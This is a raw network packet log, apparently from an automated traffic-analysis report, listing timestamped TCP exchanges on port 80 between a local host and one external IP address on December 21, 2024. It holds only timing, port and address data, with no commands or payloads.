                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.278017998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.279042006 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.279098034 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.279139042 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.279189110 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.280204058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.280229092 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.280251026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.280275106 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.281348944 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.281394958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.281438112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.281492949 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.282510042 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.282576084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.282613039 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.282655954 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.283696890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.283744097 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.283840895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.283889055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.284894943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.284959078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.285027027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.285068989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.286057949 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.286082029 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.286104918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.286118984 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.287237883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.287286043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.287445068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.287528038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.288397074 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.288448095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.288538933 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.288646936 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.289511919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.289556980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.289722919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.289769888 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.290663958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.290831089 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.290858984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.290900946 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.291860104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.291897058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.291934013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.292023897 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.292989969 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.293052912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.293107033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.294192076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.294282913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.294322014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.294365883 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.295330048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.295377970 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.295416117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.295463085 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.296480894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.296528101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.296581984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.296623945 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.297702074 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.297758102 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.297801971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.297841072 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.298820972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.298867941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.298930883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.298978090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.299978018 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.300024986 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.300097942 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.300173998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.301150084 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.301193953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.301275015 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.301330090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.302316904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.302364111 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.302402020 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.302453041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.303486109 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.303531885 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.303579092 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.303627014 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.304649115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.304733992 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.304754019 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.304809093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.305809975 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.305857897 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.305896044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.305936098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.307020903 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.307037115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.307064056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.307085991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.308140039 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.308181047 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.308254004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.308299065 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.309330940 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.309406996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.309417963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.309463978 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.310458899 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.310513020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.310556889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.310600996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.311624050 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.311671972 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.311788082 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.311834097 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.312833071 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.312891006 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.312949896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.313024998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.313973904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.314023972 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.314069033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.314112902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.315116882 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.315165043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.315212011 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.315263987 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.316284895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.316334963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.316380024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.316452026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.317462921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.317534924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.317565918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.317608118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.318627119 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.318674088 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.318763971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.318806887 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.319767952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.319819927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.319874048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.319916010 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.320955038 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.321006060 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.321049929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.321094036 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.322124958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.322175026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.322212934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.322252989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.323287964 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.323364019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.323407888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.323450089 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.324455023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.324501038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.324543953 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.324599028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.325608015 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.325655937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.325725079 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.325773001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.326809883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.326855898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.326915026 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.326961040 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.327984095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.328032017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.328111887 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.328161001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.329101086 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.329154968 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.329236031 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.329282045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.330265045 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.330334902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.330341101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.330379009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.465738058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.465801001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.465873003 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.466295004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.466584921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.466644049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.467436075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.467494965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.467539072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.468455076 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.468578100 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.468626022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.468698025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.468744993 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.469774008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.469830990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.469876051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.469924927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.471015930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.471081018 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.471169949 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.471214056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.472091913 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.472136974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.472440004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.473256111 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.473295927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.473365068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.473872900 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.474426985 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.474479914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.474570990 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.475578070 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.475627899 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.475677013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.476445913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.476752996 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.476876020 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.476917982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.477907896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.477973938 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.478019953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.479078054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.479125023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.479168892 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.480282068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.480334997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.480370998 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.480443001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.481401920 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.481455088 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.481528997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.481571913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.482620955 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.482661963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.482698917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.482738972 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.483741045 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.483779907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.483871937 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.483911991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.484896898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.484939098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.485008001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.485048056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.486124039 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.486166000 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.486238003 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.486280918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.487260103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.487301111 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.487346888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.487387896 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.488405943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.488445044 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.488506079 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.488547087 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.489536047 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.489579916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.489725113 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.489762068 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.490726948 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.490767956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.490818977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.490856886 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.491872072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.491911888 CET4982880192.168.2.531.41.244.11
